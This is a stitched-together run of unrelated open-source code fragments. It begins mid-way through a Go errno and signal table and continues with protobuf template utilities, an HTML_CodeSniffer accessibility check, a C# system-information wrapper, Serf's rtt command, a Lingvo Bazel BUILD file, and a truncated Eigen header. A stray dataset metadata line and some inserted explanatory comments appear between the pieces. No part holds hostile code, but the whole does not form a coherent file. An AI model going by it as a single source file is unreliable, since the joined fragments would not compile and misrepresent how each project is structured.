EKEYEXPIRED = syscall.Errno(0x7f)
EKEYREJECTED = syscall.Errno(0x81)
EKEYREVOKED = syscall.Errno(0x80)
EL2HLT = syscall.Errno(0x33)
EL2NSYNC = syscall.Errno(0x2d)
EL3HLT = syscall.Errno(0x2e)
EL3RST = syscall.Errno(0x2f)
ELIBACC = syscall.Errno(0x4f)
ELIBBAD = syscall.Errno(0x50)
ELIBEXEC = syscall.Errno(0x53)
ELIBMAX = syscall.Errno(0x52)
ELIBSCN = syscall.Errno(0x51)
ELNRNG = syscall.Errno(0x30)
ELOOP = syscall.Errno(0x28)
EMEDIUMTYPE = syscall.Errno(0x7c)
EMFILE = syscall.Errno(0x18)
EMLINK = syscall.Errno(0x1f)
EMSGSIZE = syscall.Errno(0x5a)
EMULTIHOP = syscall.Errno(0x48)
ENAMETOOLONG = syscall.Errno(0x24)
ENAVAIL = syscall.Errno(0x77)
ENETDOWN = syscall.Errno(0x64)
ENETRESET = syscall.Errno(0x66)
ENETUNREACH = syscall.Errno(0x65)
ENFILE = syscall.Errno(0x17)
ENOANO = syscall.Errno(0x37)
ENOBUFS = syscall.Errno(0x69)
ENOCSI = syscall.Errno(0x32)
ENODATA = syscall.Errno(0x3d)
ENODEV = syscall.Errno(0x13)
ENOENT = syscall.Errno(0x2)
ENOEXEC = syscall.Errno(0x8)
ENOKEY = syscall.Errno(0x7e)
ENOLCK = syscall.Errno(0x25)
ENOLINK = syscall.Errno(0x43)
ENOMEDIUM = syscall.Errno(0x7b)
ENOMEM = syscall.Errno(0xc)
ENOMSG = syscall.Errno(0x2a)
ENONET = syscall.Errno(0x40)
ENOPKG = syscall.Errno(0x41)
ENOPROTOOPT = syscall.Errno(0x5c)
ENOSPC = syscall.Errno(0x1c)
ENOSR = syscall.Errno(0x3f)
ENOSTR = syscall.Errno(0x3c)
ENOSYS = syscall.Errno(0x26)
ENOTBLK = syscall.Errno(0xf)
ENOTCONN = syscall.Errno(0x6b)
ENOTDIR = syscall.Errno(0x14)
ENOTEMPTY = syscall.Errno(0x27)
ENOTNAM = syscall.Errno(0x76)
ENOTRECOVERABLE = syscall.Errno(0x83)
ENOTSOCK = syscall.Errno(0x58)
ENOTSUP = syscall.Errno(0x5f)
ENOTTY = syscall.Errno(0x19)
ENOTUNIQ = syscall.Errno(0x4c)
ENXIO = syscall.Errno(0x6)
EOPNOTSUPP = syscall.Errno(0x5f)
EOVERFLOW = syscall.Errno(0x4b)
EOWNERDEAD = syscall.Errno(0x82)
EPERM = syscall.Errno(0x1)
EPFNOSUPPORT = syscall.Errno(0x60)
EPIPE = syscall.Errno(0x20)
EPROTO = syscall.Errno(0x47)
EPROTONOSUPPORT = syscall.Errno(0x5d)
EPROTOTYPE = syscall.Errno(0x5b)
ERANGE = syscall.Errno(0x22)
EREMCHG = syscall.Errno(0x4e)
EREMOTE = syscall.Errno(0x42)
EREMOTEIO = syscall.Errno(0x79)
ERESTART = syscall.Errno(0x55)
ERFKILL = syscall.Errno(0x84)
EROFS = syscall.Errno(0x1e)
ESHUTDOWN = syscall.Errno(0x6c)
ESOCKTNOSUPPORT = syscall.Errno(0x5e)
ESPIPE = syscall.Errno(0x1d)
ESRCH = syscall.Errno(0x3)
ESRMNT = syscall.Errno(0x45)
ESTALE = syscall.Errno(0x74)
ESTRPIPE = syscall.Errno(0x56)
ETIME = syscall.Errno(0x3e)
ETIMEDOUT = syscall.Errno(0x6e)
ETOOMANYREFS = syscall.Errno(0x6d)
ETXTBSY = syscall.Errno(0x1a)
EUCLEAN = syscall.Errno(0x75)
EUNATCH = syscall.Errno(0x31)
EUSERS = syscall.Errno(0x57)
EWOULDBLOCK = syscall.Errno(0xb)
EXDEV = syscall.Errno(0x12)
EXFULL = syscall.Errno(0x36)
)
// Signals
const (
SIGABRT = syscall.Signal(0x6)
SIGALRM = syscall.Signal(0xe)
SIGBUS = syscall.Signal(0x7)
SIGCHLD = syscall.Signal(0x11)
SIGCLD = syscall.Signal(0x11)
SIGCONT = syscall.Signal(0x12)
SIGFPE = syscall.Signal(0x8)
SIGHUP = syscall.Signal(0x1)
SIGILL = syscall.Signal(0x4)
SIGINT = syscall.Signal(0x2)
SIGIO = syscall.Signal(0x1d)
SIGIOT = syscall.Signal(0x6)
SIGKILL = syscall.Signal(0x9)
SIGPIPE = syscall.Signal(0xd)
SIGPOLL = syscall.Signal(0x1d)
SIGPROF = syscall.Signal(0x1b)
SIGPWR = syscall.Signal(0x1e)
SIGQUIT = syscall.Signal(0x3)
SIGSEGV = syscall.Signal(0xb)
SIGSTKFLT = syscall.Signal(0x10)
SIGSTOP = syscall.Signal(0x13)
SIGSYS = syscall.Signal(0x1f)
SIGTERM = syscall.Signal(0xf)
SIGTRAP = syscall.Signal(0x5)
SIGTSTP = syscall.Signal(0x14)
SIGTTIN = syscall.Signal(0x15)
SIGTTOU = syscall.Signal(0x16)
SIGURG = syscall.Signal(0x17)
SIGUSR1 = syscall.Signal(0xa)
SIGUSR2 = syscall.Signal(0xc)
SIGVTALRM = syscall.Signal(0x1a)
SIGWINCH = syscall.Signal(0x1c)
SIGXCPU = syscall.Signal(0x18)
SIGXFSZ = syscall.Signal(0x19)
)
// Error table
var errors = [...]string{
1: "operation not permitted",
2: "no such file or directory",
3: "no such process",
4: "interrupted system call",
5: "input/output error",
6: "no such device or address",
7: "argument list too long",
8: "exec format error",
9: "bad file descriptor",
10: "no child processes",
11: "resource temporarily unavailable",
12: "cannot allocate memory",
13: "permission denied",
14: "bad address",
15: "block device required",
16: "device or resource busy",
17: "file exists",
18: "invalid cross-device link",
19: "no such device",
20: "not a directory",
21: "is a directory",
22: "invalid argument",
23: "too many open files in system",
24: "too many open files",
25: "inappropriate ioctl for device",
26: "text file busy",
27: "file too large",
28: "no space left on device",
29: "illegal seek",
30: "read-only file system",
31: "too many links",
32: "broken pipe",
33: "numerical argument out of domain",
34: "numerical result out of range",
35: "resource deadlock avoided",
36: "file name too long",
37: "no locks available",
38: "function not implemented",
39: "directory not empty",
40: "too many levels of symbolic links",
42: "no message of desired type",
43: "identifier removed",
44: "channel number out of range",
45: "level 2 not synchronized",
46: "level 3 halted",
47: "level 3 reset",
48: "link number out of range",
49: "protocol driver not attached",
50: "no CSI structure available",
51: "level 2 halted",
52: "invalid exchange",
53: "invalid request descriptor",
54: "exchange full",
55: "no anode",
56: "invalid request code",
57: "invalid slot",
59: "bad font file format",
60: "device not a stream",
61: "no data available",
62: "timer expired",
63: "out of streams resources",
64: "machine is not on the network",
65: "package not installed",
66: "object is remote",
67: "link has been severed",
68: "advertise error",
69: "srmount error",
70: "communication error on send",
71: "protocol error",
72: "multihop attempted",
73: "RFS specific error",
74: "bad message",
75: "value too large for defined data type",
76: "name not unique on network",
77: "file descriptor in bad state",
78: "remote address changed",
79: "can not access a needed shared library",
80: "accessing a corrupted shared library",
81: ".lib section in a.out corrupted",
82: "attempting to link in too many shared libraries",
83: "cannot exec a shared library directly",
84: "invalid or incomplete multibyte or wide character",
85: "interrupted system call should be restarted",
86: "streams pipe error",
87: "too many users",
88: "socket operation on non-socket",
89: "destination address required",
90: "message too long",
91: "protocol wrong type for socket",
92: "protocol not available",
93: "protocol not supported",
94: "socket type not supported",
95: "operation not supported",
96: "protocol family not supported",
97: "address family not supported by protocol",
98: "address already in use",
99: "cannot assign requested address",
100: "network is down",
101: "network is unreachable",
102: "network dropped connection on reset",
103: "software caused connection abort",
104: "connection reset by peer",
105: "no buffer space available",
106: "transport endpoint is already connected",
107: "transport endpoint is not connected",
108: "cannot send after transport endpoint shutdown",
109: "too many references: cannot splice",
110: "connection timed out",
111: "connection refused",
112: "host is down",
113: "no route to host",
114: "operation already in progress",
115: "operation now in progress",
116: "stale file handle",
117: "structure needs cleaning",
118: "not a XENIX named type file",
119: "no XENIX semaphores available",
120: "is a named type file",
121: "remote I/O error",
122: "disk quota exceeded",
123: "no medium found",
124: "wrong medium type",
125: "operation canceled",
126: "required key not available",
127: "key has expired",
128: "key has been revoked",
129: "key was rejected by service",
130: "owner died",
131: "state not recoverable",
132: "operation not possible due to RF-kill",
133: "memory page has hardware error",
}
// Signal table
var signals = [...]string{
1: "hangup",
2: "interrupt",
3: "quit",
4: "illegal instruction",
5: "trace/breakpoint trap",
6: "aborted",
7: "bus error",
8: "floating point exception",
9: "killed",
10: "user defined signal 1",
11: "segmentation fault",
12: "user defined signal 2",
13: "broken pipe",
14: "alarm clock",
15: "terminated",
16: "stack fault",
17: "child exited",
18: "continued",
19: "stopped (signal)",
20: "stopped",
21: "stopped (tty input)",
22: "stopped (tty output)",
23: "urgent I/O condition",
24: "CPU time limit exceeded",
25: "file size limit exceeded",
26: "virtual timer expired",
27: "profiling timer expired",
28: "window changed",
29: "I/O possible",
30: "power failure",
31: "bad system call",
}
// Copyright 2005 Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// ----
// Author: [email protected] (Laramie Leavitt)
//
// Template metaprogramming utility functions.
//
// This code is compiled directly on many platforms, including client
// platforms like Windows, Mac, and embedded systems. Before making
// any changes here, make sure that you're not breaking any platforms.
//
//
// The names chosen here reflect those used in tr1 and the boost::mpl
// library; there are similar operations used in the Loki library as
// well. I prefer the boost names for 2 reasons:
// 1. I think that portions of the Boost libraries are more likely to
// be included in the c++ standard.
// 2. It is not impossible that some of the boost libraries will be
// included in our own build in the future.
// Both of these outcomes mean that we may be able to directly replace
// some of these with boost equivalents.
//
#ifndef GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
#define GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
namespace google {
namespace protobuf {
namespace internal {
// Types small_ and big_ are guaranteed such that sizeof(small_) <
// sizeof(big_)
typedef char small_;
struct big_ {
char dummy[2];
};
// Identity metafunction.
template <class T>
struct identity_ {
typedef T type;
};
// integral_constant, defined in tr1, is a wrapper for an integer
// value. We don't really need this generality; we could get away
// with hardcoding the integer type to bool. We use the fully
// general integral_constant for compatibility with tr1.
template<class T, T v>
struct integral_constant {
static const T value = v;
typedef T value_type;
typedef integral_constant<T, v> type;
};
template <class T, T v> const T integral_constant<T, v>::value;
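// Illustrative note (added, not in the original header): because value is
// a static member initialized from the template argument,
// integral_constant<int, 3>::value is 3 and
// integral_constant<bool, true>::value is true.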
// Abbreviations: true_type and false_type are structs that represent boolean
// true and false values. Also define the boost::mpl versions of those names,
// true_ and false_.
typedef integral_constant<bool, true> true_type;
typedef integral_constant<bool, false> false_type;
typedef true_type true_;
typedef false_type false_;
// if_ is a templatized conditional statement.
// if_<cond, A, B> is a compile time evaluation of cond.
// if_<>::type contains A if cond is true, B otherwise.
template<bool cond, typename A, typename B>
struct if_ {
typedef A type;
};
template<typename A, typename B>
struct if_<false, A, B> {
typedef B type;
};
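// Illustrative note (added, not in the original header): the primary
// template yields the first type and the specialization yields the second,
// so if_<true, int, char>::type is int while if_<false, int, char>::type
// is char. A typical (hypothetical) use:
//   typedef if_<(sizeof(void*) == 8), int64_t, int32_t>::type ptr_sized_int;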
// type_equals_ is a template type comparator, similar to Loki IsSameType.
// type_equals_<A, B>::value is true iff "A" is the same type as "B".
//
// New code should prefer base::is_same, defined in base/type_traits.h.
// It is functionally identical, but is_same is the standard spelling.
template<typename A, typename B>
struct type_equals_ : public false_ {
};
template<typename A>
struct type_equals_<A, A> : public true_ {
};
// and_ is a template && operator.
// and_<A, B>::value evaluates "A::value && B::value".
template<typename A, typename B>
struct and_ : public integral_constant<bool, (A::value && B::value)> {
};
// or_ is a template || operator.
// or_<A, B>::value evaluates "A::value || B::value".
template<typename A, typename B>
struct or_ : public integral_constant<bool, (A::value || B::value)> {
};
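// Illustrative note (added, not in the original header): these helpers
// compose at compile time exactly as described above, e.g.
//   type_equals_<int, int>::value   is true
//   type_equals_<int, char>::value  is false
//   and_<true_, false_>::value      is false
//   or_<true_, false_>::value       is true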
} // namespace internal
} // namespace protobuf
} // namespace google
#endif // GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
/**
* +--------------------------------------------------------------------+
* | This HTML_CodeSniffer file is Copyright (c) |
* | Squiz Australia Pty Ltd ABN 53 131 581 247 |
* +--------------------------------------------------------------------+
* | IMPORTANT: Your use of this Software is subject to the terms of |
* | the Licence provided in the file licence.txt. If you cannot find |
* | this file please contact Squiz (www.squiz.com.au) so we may |
* | provide you a copy. |
* +--------------------------------------------------------------------+
*
*/
_global.HTMLCS_Section508_Sniffs_I = {
/**
* Determines the elements to register for processing.
*
* Each element of the returned array can either be an element name, or "_top"
* which is the top element of the tested code.
*
* @returns {Array} The list of elements.
*/
register: function()
{
return [
'frame',
'iframe',
'object'
];
},
/**
* Process the registered element.
*
* @param {DOMNode} element The element registered.
* @param {DOMNode} top The top element of the tested code.
*/
process: function(element, top)
{
var nodeName = element.nodeName.toLowerCase();
var hasTitle = element.hasAttribute('title');
var titleEmpty = true;
if (hasTitle === true) {
titleEmpty = HTMLCS.util.isStringEmpty(element.getAttribute('title'));
}
if (titleEmpty === true) {
HTMLCS.addMessage(HTMLCS.ERROR, top, 'This ' + nodeName + ' element is missing title text. Frames should be titled with text that facilitates frame identification and navigation.', 'Frames');
}
}
};
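// Illustrative note (added, not part of the original sniff): an element such
// as <iframe src="ad.html"></iframe> is reported because it has no title
// attribute, while <iframe src="ad.html" title="Advertisement"></iframe>
// passes this check since the title attribute exists and is non-empty.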
using System;
using System.ComponentModel;
using WinForms = System.Windows.Forms;
namespace StarryEyes.Nightmare.Windows
{
public static class SystemInformation
{
public static string ComputerName
{
get { return WinForms.SystemInformation.ComputerName; }
}
public static string UserName
{
get { return WinForms.SystemInformation.UserName; }
}
public static bool MouseButtonsSwapped
{
get { return WinForms.SystemInformation.MouseButtonsSwapped; }
}
public static int MouseWheelScrollDelta
{
get { return WinForms.SystemInformation.MouseWheelScrollDelta; }
}
public static uint DesktopHeapSize
{
get
{
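// Descriptive note (added): open a handle to the desktop that is currently
// receiving input, query GetUserObjectInformation for UOI_HEAPSIZE (a
// 32-bit unsigned value), and release the handle in the finally block
// whether or not the query succeeds.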
var hDesktop = NativeMethods.OpenInputDesktop(0, false, NativeMethods.GENERIC_READ);
if (hDesktop == IntPtr.Zero)
{
throw new Win32Exception();
}
try
{
var buffer = new byte[4]; // unsigned long(32bit)
uint n;
if (!NativeMethods.GetUserObjectInformation(hDesktop, NativeMethods.UOI_HEAPSIZE, buffer, sizeof(byte) * 4, out n))
{
throw new Win32Exception();
}
return BitConverter.ToUInt32(buffer, 0);
}
finally
{
NativeMethods.CloseDesktop(hDesktop);
}
}
}
}
}
package command
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
)
// RTTCommand is a Command implementation that allows users to query the
// estimated round trip time between nodes using network coordinates.
type RTTCommand struct {
Ui cli.Ui
}
func (c *RTTCommand) Help() string {
helpText := `
Usage: serf rtt [options] node1 [node2]
Estimates the round trip time between two nodes using Serf's network
coordinate model of the cluster.
At least one node name is required. If the second node name isn't given, it
is set to the agent's node name. Note that these are node names as known to
Serf as "serf members" would show, not IP addresses.
Options:
-rpc-addr=127.0.0.1:7373 RPC address of the Serf agent.
-rpc-auth="" RPC auth token of the Serf agent.
`
return strings.TrimSpace(helpText)
}
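// Illustrative example (added, not part of the original source): running
// "serf rtt node-a node-b" against an agent that knows both members prints
// a line of the form
//   Estimated node-a <-> node-b rtt: 0.523 ms
// where the distance is computed by coord1.DistanceTo(coord2) in Run below.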
func (c *RTTCommand) Run(args []string) int {
cmdFlags := flag.NewFlagSet("rtt", flag.ContinueOnError)
cmdFlags.Usage = func() { c.Ui.Output(c.Help()) }
rpcAddr := RPCAddrFlag(cmdFlags)
rpcAuth := RPCAuthFlag(cmdFlags)
if err := cmdFlags.Parse(args); err != nil {
return 1
}
// Create the RPC client.
client, err := RPCClient(*rpcAddr, *rpcAuth)
if err != nil {
c.Ui.Error(fmt.Sprintf("Error connecting to Serf agent: %s", err))
return 1
}
defer client.Close()
// They must provide at least one node.
nodes := cmdFlags.Args()
if len(nodes) == 1 {
stats, err := client.Stats()
if err != nil {
c.Ui.Error(fmt.Sprintf("Error querying agent: %s", err))
return 1
}
nodes = append(nodes, stats["agent"]["name"])
} else if len(nodes) != 2 {
c.Ui.Error("One or two node names must be specified")
c.Ui.Error("")
c.Ui.Error(c.Help())
return 1
}
// Get the coordinates.
coord1, err := client.GetCoordinate(nodes[0])
if err != nil {
c.Ui.Error(fmt.Sprintf("Error getting coordinates: %s", err))
return 1
}
if coord1 == nil {
c.Ui.Error(fmt.Sprintf("Could not find a coordinate for node %q", nodes[0]))
return 1
}
coord2, err := client.GetCoordinate(nodes[1])
if err != nil {
c.Ui.Error(fmt.Sprintf("Error getting coordinates: %s", err))
return 1
}
if coord2 == nil {
c.Ui.Error(fmt.Sprintf("Could not find a coordinate for node %q", nodes[1]))
return 1
}
// Report the round trip time.
dist := fmt.Sprintf("%.3f ms", coord1.DistanceTo(coord2).Seconds()*1000.0)
c.Ui.Output(fmt.Sprintf("Estimated %s <-> %s rtt: %s", nodes[0], nodes[1], dist))
return 0
}
func (c *RTTCommand) Synopsis() string {
return "Estimates network round trip time between nodes"
}
load(
"//lingvo:lingvo.bzl",
"lingvo_py_binary",
)
package(
default_visibility = ["//visibility:public"],
)
licenses(["notice"])
exports_files(["LICENSE"])
config_setting(
name = "cuda",
values = {"define": "using_cuda=true"},
)
py_library(
name = "base_runner",
srcs = ["base_runner.py"],
srcs_version = "PY3",
deps = [
":base_trial",
":compat",
"//lingvo/core:cluster_factory",
"//lingvo/core:early_stop",
"//lingvo/core:py_utils",
# Implicit tensorflow py proto dependency.
],
)
py_library(
name = "base_trial",
srcs = ["base_trial.py"],
srcs_version = "PY3",
deps = [
"//lingvo/core:hyperparams",
],
)
py_library(
name = "compat",
srcs = ["compat.py"],
srcs_version = "PY3",
deps = [
# Implicit absl.flags dependency.
# Implicit absl.logging dependency.
# Implicit tensorflow dependency.
],
)
py_test(
name = "compat_test",
srcs = ["compat_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
],
)
py_library(
name = "model_imports_no_params",
srcs = ["model_imports.py"],
srcs_version = "PY3",
)
# Depend on this for access to the model registry with params for all tasks as
# transitive deps. Only py_binary should depend on this target.
py_library(
name = "model_imports",
srcs_version = "PY3",
deps = [
":model_imports_no_params",
"//lingvo/tasks:all_params",
],
)
py_test(
name = "model_import_test",
srcs = ["model_import_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":model_imports_no_params",
],
)
py_library(
name = "models_test_helper",
testonly = 1,
srcs = ["models_test_helper.py"],
srcs_version = "PY3",
deps = [
":compat",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:bn_layers",
"//lingvo/core:py_utils",
"//lingvo/core:test_utils",
],
)
py_test(
name = "models_test",
srcs = ["models_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":model_imports",
":model_registry",
":model_registry_test_lib",
":models_test_helper",
"//lingvo/core:base_model",
],
)
py_library(
name = "model_registry",
srcs = ["model_registry.py"],
srcs_version = "PY3",
deps = [
":compat",
":model_imports_no_params",
"//lingvo/core:base_model_params",
],
)
py_test(
name = "model_registry_test",
srcs = ["model_registry_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [":model_registry_test_lib"],
)
py_library(
name = "model_registry_test_lib",
testonly = 1,
srcs = ["model_registry_test.py"],
srcs_version = "PY3",
deps = [
":compat",
":model_registry",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:test_utils",
],
)
py_library(
name = "datasets_lib",
srcs = ["datasets.py"],
srcs_version = "PY3",
)
py_test(
name = "datasets_test",
srcs = ["datasets_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":datasets_lib",
"//lingvo/core:test_utils",
],
)
py_library(
name = "trainer_lib",
srcs = ["trainer.py"],
srcs_version = "PY3",
deps = [
":base_trial",
":compat",
":datasets_lib",
":executor_lib",
":model_imports_no_params",
":model_registry",
# Implicit network file system dependency.
"//lingvo:base_runner",
# Implicit IPython dependency.
"//lingvo/core:base_layer",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:checkpointer_lib",
"//lingvo/core:cluster_factory",
"//lingvo/core:inference_graph_exporter",
"//lingvo/core:metrics",
"//lingvo/core:py_utils",
"//lingvo/core:summary_utils",
# Implicit numpy dependency.
# Implicit tensorflow grpc dependency.
],
)
lingvo_py_binary(
name = "trainer",
srcs = [":trainer_lib"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":model_imports",
":trainer_lib",
],
)
py_test(
name = "trainer_test",
size = "large",
timeout = "long",
srcs = ["trainer_test.py"],
python_version = "PY3",
shard_count = 12,
srcs_version = "PY3",
tags = [
"noasan",
"nomsan",
"notsan",
"optonly",
],
deps = [
":base_trial",
":compat",
":model_registry",
":trainer_lib",
# Implicit absl.testing.flagsaver dependency.
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:hyperparams",
"//lingvo/core:inference_graph_py_pb2",
"//lingvo/core:test_utils",
"//lingvo/core:trainer_test_utils",
"//lingvo/tasks/image:input_generator",
"//lingvo/tasks/image/params:mnist", # build_cleaner: keep
"//lingvo/tasks/punctuator/params:codelab", # build_cleaner: keep
# Implicit numpy dependency.
],
)
py_library(
name = "trainer_test_lib",
testonly = 1,
srcs = ["trainer_test.py"],
srcs_version = "PY3",
tags = [
"noasan",
"nomsan",
"notsan",
"optonly",
],
deps = [
":base_trial",
":compat",
":model_registry",
":trainer_lib",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_layer",
"//lingvo/core:base_model",
"//lingvo/core:py_utils",
"//lingvo/core:test_utils",
"//lingvo/core:trainer_test_utils",
"//lingvo/tasks/image:input_generator",
"//lingvo/tasks/image/params:mnist",
"//lingvo/tasks/punctuator/params:codelab",
# Implicit numpy dependency.
],
)
lingvo_py_binary(
name = "ipython_kernel",
srcs = ["ipython_kernel.py"],
data = [
"//lingvo/tasks/punctuator/tools:download_brown_corpus",
],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":model_imports", # build_cleaner: keep
":trainer_lib", # build_cleaner: keep
# Implicit absl.app dependency.
"//lingvo/core:predictor_lib", # build_cleaner: keep
"//lingvo/core/ops:hyps_py_pb2", # build_cleaner: keep
],
)
genrule(
name = "tf_dot_protos",
srcs = [],
outs = ["tf_protos.tar"],
cmd =
"$(location //lingvo/tools:" +
"generate_tf_dot_protos) $(location " +
"//lingvo/tools:generate_proto_def) $(@D)",
tools = [
"//lingvo/tools:generate_proto_def",
"//lingvo/tools:generate_tf_dot_protos",
],
)
py_library(
name = "executor_lib",
srcs = ["executor.py"],
srcs_version = "PY3",
deps = [
":compat",
# Implicit network file system dependency.
"//lingvo:base_runner",
"//lingvo/core:base_model",
"//lingvo/core:checkpointer_lib",
"//lingvo/core:cluster_factory",
"//lingvo/core:ml_perf_log",
"//lingvo/core:multitask_model",
"//lingvo/core:py_utils",
"//lingvo/core:task_scheduler",
# Implicit tensorflow grpc dependency.
],
)
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2008 Gael Guennebaud <[email protected]>
// Copyright (C) 2006-2008 Benoit Jacob <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_GENERIC_PACKET_MATH_H
#define EIGEN_GENERIC_PACKET_MATH_H
namespace Eigen {
namespace internal {
/** \internal
* \file GenericPacketMath.h
*
* Default implementation for types not supported by the vectorization.
* In practice these functions are provided to make it easier to write
* generic vectorized code.
*/
#ifndef EIGEN_DEBUG_ALIGNED_LOAD
#define EIGEN_DEBUG_ALIGNED_LOAD
#endif
#ifndef EIGEN_DEBUG_UNALIGNED_LOAD
#define EIGEN_DEBUG_UNALIGNED_LOAD
#endif
#ifndef EIGEN_DEBUG_ALIGNED_STORE
#define EIGEN_DEBUG_ALIGNED_STORE
#endif
#ifndef EIGEN_DEBUG_UNALIGNED_STORE
#define EIGEN_DEBUG_UNALIGNED_STORE
#endif
struct default_packet_traits
{
enum {
HasHalfPacket = 0,
HasAdd = 1,
HasSub = 1,
HasMul = 1,
HasNegate = 1,
HasAbs = 1,
HasArg = 0,
HasAbs2 = 1,
HasMin = 1,
HasMax = 1,
HasConj = 1,
HasSetLinear = 1,
HasBlend = 0,
HasDiv = 0,
HasSqrt = 0,
HasRsqrt = 0,
HasExp = 0,
HasLog = 0,
HasLog1p = 0,
HasLog10 = 0,
HasPow = 0,
HasSin = 0,
HasCos = 0,
HasTan = 0,
HasASin = 0,
HasACos = 0,
HasATan = 0,
HasSinh = 0,
HasCosh = 0,
HasTanh = 0,
HasLGamma = 0,
HasDiGamma = 0,
HasZeta = 0,
HasPolygamma = 0,
HasErf = 0,
HasErfc = 0,
HasIGamma = 0,
HasIGammac = 0,
HasBetaInc = 0,
HasRound = 0,
HasFloor = 0,
HasCeil = 0,
HasSign = 0
};
};
template<typename T> struct packet_traits : default_packet_traits
{
typedef T type;
typedef T half;
enum {
Vectorizable = 0,
size = 1,
AlignedOnScalar = 0,
HasHalfPacket = 0
};
enum {
HasAdd = 0,
HasSub = 0,
HasMul = 0,
HasNegate = 0,
HasAbs = 0,
HasAbs2 = 0,
HasMin = 0,
HasMax = 0,
HasConj = 0,
HasSetLinear = 0
};
};
template<typename T> struct packet_traits<const T> : packet_traits<T> { };
template <typename Src, typename Tgt> struct type_casting_traits {
enum {
VectorizedCast = 0,
SrcCoeffRatio = 1,
TgtCoeffRatio = 1
};
};
/** \internal \returns static_cast<TgtType>(a) (coeff-wise) */
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a) {
return static_cast<TgtPacket>(a);
}
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a, const SrcPacket& /*b*/) {
return static_cast<TgtPacket>(a);
}
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a, const SrcPacket& /*b*/, const SrcPacket& /*c*/, const SrcPacket& /*d*/) {
return static_cast<TgtPacket>(a);
}
/** \internal \returns a + b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
padd(const Packet& a,
const Packet& b) { return a+b; }
/** \internal \returns a - b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
psub(const Packet& a,
const Packet& b) { return a-b; }
/** \internal \returns -a (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pnegate(const Packet& a) { return -a; }
/** \internal \returns conj(a) (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pconj(const Packet& a) { return numext::conj(a); }
/** \internal \returns a * b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmul(const Packet& a,
const Packet& b) { return a*b; }
/** \internal \returns a / b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pdiv(const Packet& a,
const Packet& b) { return a/b; }
/** \internal \returns the min of \a a and \a b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmin(const Packet& a,
const Packet& b) { return numext::mini(a, b); }
/** \internal \returns the max of \a a and \a b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmax(const Packet& a,
const Packet& b) { return numext::maxi(a, b); }
/** \internal \returns the absolute value of \a a */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pabs(const Packet& a) { using std::abs; return abs(a); }
/** \internal \returns the phase angle of \a a */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
parg(const Packet& a) { using numext::arg; return arg(a); }
/** \internal \returns the bitwise and of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pand(const Packet& a, const Packet& b) { return a & b; }
/** \internal \returns the bitwise or of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
por(const Packet& a, const Packet& b) { return a | b; }
/** \internal \returns the bitwise xor of \a a and \a b */
